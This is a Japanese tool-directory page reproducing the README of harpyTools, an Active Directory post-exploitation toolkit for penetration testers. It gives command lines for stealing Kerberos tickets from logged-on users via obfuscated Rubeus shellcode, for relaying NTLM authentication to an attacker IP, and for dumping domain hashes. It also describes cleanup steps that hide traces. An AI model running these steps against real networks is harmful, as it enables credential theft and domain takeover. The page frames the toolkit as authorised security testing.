Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
harpyTools — Active Directoryの自動化されたポストエクスプロイテーションツールキット。Kerberosチケット抽出、NTLMリレー攻撃、NetExec、Impacket、Donut統合によるラテラルムーブメントをサポート。 | Kitploit
ツール/GitHubGitHub/jssngc/harpytools
特権昇格ペイロード生成エクスプロイト横移動シェルコードポストエクスプロイトペネトレーションテストコマンド&コントロールレッドチーミング
GitHubjssngc/harpytools

harpyTools

Active Directoryの自動化されたポストエクスプロイテーションツールキット。Kerberosチケット抽出、NTLMリレー攻撃、NetExec、Impacket、Donut統合によるラテラルムーブメントをサポート。

1921ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

Active Directory ポストエクスプロイテーションおよびリレー自動化ユーティリティ

このリポジトリには、Active Directory環境内でのセキュリティ評価とペネトレーションテストのために設計されたPythonオーケストレータースクリプトのコレクションが含まれています。これらのツールは、侵害されたワークステーションまたはサーバー上でローカル管理者アクセスが既に確立されており、広範なActive Directoryドメインに向けてラテラルムーブメントまたは権限昇格を実行することを目的とするポストエクスプロイテーションシナリオに特化して設計されています。

NetExec、Impacket、Donut、BloodyADなどの一般的なセキュリティユーティリティを含むワークフローを自動化することで、これらのスクリプトは複雑なマルチステッププロセスを繰り返し可能な単一コマンド操作に効率化します。

前提条件

スクリプトは、以下のツールがホストシステムにインストールされ、システムの PATH 内で利用可能であることを必要とします:

  • Python 3.x
  • NetExec (nxc)
  • Impacket (impacket-ntlmrelayx, impacket-secretsdump, impacket-ticketConverter)
  • Donut (シェルコードジェネレータ)
  • Myph (バイナリコンパイラ/難読化ツール)
  • BloodyAD (Active Directory管理ツール)
  • 標準Linuxユーティリティ: awk、base64

オプションのPython依存関係

コンソール出力の書式を強化するには、以下のパッケージをインストールしてください:

root@kitploit:~
pip install colorama rich

コンポーネント概要

1. TGT抽出オーケストレーター (harpyTGT.py)

このスクリプトは、ログイン中のWindowsセッションからKerberos Ticket Granting Ticket (TGT) の抽出を自動化し、Linux互換の ccache 形式に変換します。

  • シナリオ: マシン上でローカル管理者アクセスが取得されると、このツールはオペレーターがそのホストでアクティブなドメインユーザーのKerberosチケットを収集し、平文パスワードを知らなくてもラテラルムーブメントを可能にします。
  • メカニズム: Donutを介して Rubeus.exe シェルコードペイロードを生成し、Myphを使用して難読化を適用し、スケジュールタスク (schtask_as) または mmcexec を使用して結果のバイナリをターゲットホスト上で実行します。

標準実行(対象ユーザーに管理者権限がある場合):

root@kitploit:~
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe>

代替実行(対象ユーザーに管理者権限がない場合):

root@kitploit:~
./harpyTGT.py -t <TARGET_IP> -u <LOCAL_ADMIN_USER> -p <LOCAL_ADMIN_PASS> -U <TARGET_USER> -r </path/to/Rubeus.exe> --no-target-admin --attacker-ip <ATTACKER_IP>

2. NTLMリレー自動化 (harpyRelay.py)

このスクリプトは、ドメインコントローラ上の誤って構成されたSMBまたはLDAP署名ポリシーを標的としたNTLMリレー攻撃を調整し、ドメイン全体の権限昇格を達成するか、NTDSデータベースダンプ(DCSync)を実行します。

  • シナリオ: 侵害されたホスト上の既存のローカル管理者権限を利用して、スクリプトは高権限プロセス(ドメイン管理者セッションなど)を強制的に攻撃者に認証させ、それらの資格情報をドメインコントローラにリレーしてLDAP/LDAPS経由でドメイン全体を侵害します。
  • メカニズム: ntlmrelayxリスナーを起動し、NetExecを介して侵害されたクライアントから認証要求をトリガーし、成功したエクスプロイトの出力を監視し、ドメインハッシュをダンプします。このツールには、ターゲットドメイン上のフットプリントを最小限に抑えるための自動クリーンアップルーチンが含まれています。

LDAPSフロー(標準):

root@kitploit:~
./harpyRelay.py--target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL>

LDAPフロー(LDAPSが利用できない場合の代替フロー):

root@kitploit:~
./harpyRelay.py --target-host <CLIENT_IP> --local-user <LOCAL_ADMIN> --local-pass <LOCAL_PASS> --domain-admin-user <DOMAIN_ADMIN> --attacker-ip <ATTACKER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL> --no-ldaps

3. NetExecモジュール: stealTGT

NetExec (nxc) 用のカスタムモジュールで、ターゲットマシン上の特定のログオンユーザーからKerberos Ticket Granting Ticket (TGT) を抽出するように設計されています。

このモジュールは mmcexec を介して SYSTEM として動作し、回避型ペイロード(DonutとMyphでRubeusをカプセル化)の生成、メモリ内での実行、Base64チケット出力のキャプチャ、そしてLinuxで使用可能な .ccache ファイルへの透過的な変換を自動化します。

攻撃者ホスト(Kali Linux)上の前提条件

このモジュールは、以下のユーティリティがインストールされ、$PATH 内で利用可能であることを自動的に確認します:

  • donut
  • myph
  • impacket-ticketConverter

モジュールのインストール

外部モジュールをNetExecにロードするには、stealTGT.py スクリプトをローカルのNetExecモジュールディレクトリにコピーします:

root@kitploit:~
cp stealTGT.py ~/.nxc/modules/

使用方法と構文

root@kitploit:~
netexec smb <TARGET_IP> -u <ADMIN_USER> -p <ADMIN_PASS> --local-auth -M stealTGT -o USER=<TARGET_USER> RUBEUS=/path/to/Rubeus.exe

モジュールオプション (-o):

  • USER: TGTを収集したい現在ログオン中のセッションのユーザー名(例: jdoe)。
  • RUBEUS: 攻撃者マシン上の正当な Rubeus.exe バイナリが配置されているローカルパス。

運用機能

  • 自動環境クリーンアップ: リレーユーティリティは実行中に作成された一時的なアカウントを追跡し、操作終了時に bloodyad または netexec を使用して自動的に削除を試みます。
  • 非TLS環境の処理: ドメインコントローラがLDAP over TLS (LDAPS) をサポートしない環境向けの明示的なフォールバックが含まれています。

免責事項

重要な注意事項: このリポジトリは、許可されたセキュリティ監査、脆弱性研究、教育目的のみを対象としています。システム所有者から事前に明示的な書面による許可を得ることなく、これらのツールを本番環境に対して実行することは固く禁止されています。著者は、本ソフトウェアの展開に起因する誤用、付随的損害、または法的結果について一切の責任を負いません。

ツールをダウンロード